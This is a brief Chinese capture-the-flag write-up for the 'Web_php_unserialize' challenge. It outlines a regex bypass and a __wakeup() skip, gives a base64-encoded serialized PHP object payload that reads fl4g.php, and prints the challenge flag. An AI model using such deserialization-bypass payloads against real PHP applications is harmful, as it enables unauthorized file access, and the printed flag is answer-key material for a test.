攻防世界 web部分的Web_php_unserialize的writeup

这个题就是三个点:

1、$file改成fl4g.php;

2、绕过:preg_match('/[oc]:\d+:/i', $var)

3、跳过__wakeup()。

步骤如下:

代码执行得:

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

执行即可:

攻防世界 web部分的Web_php_unserialize的writeup_第1张图片

flag即为:

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

 

你可能感兴趣的:(CTF,#,web)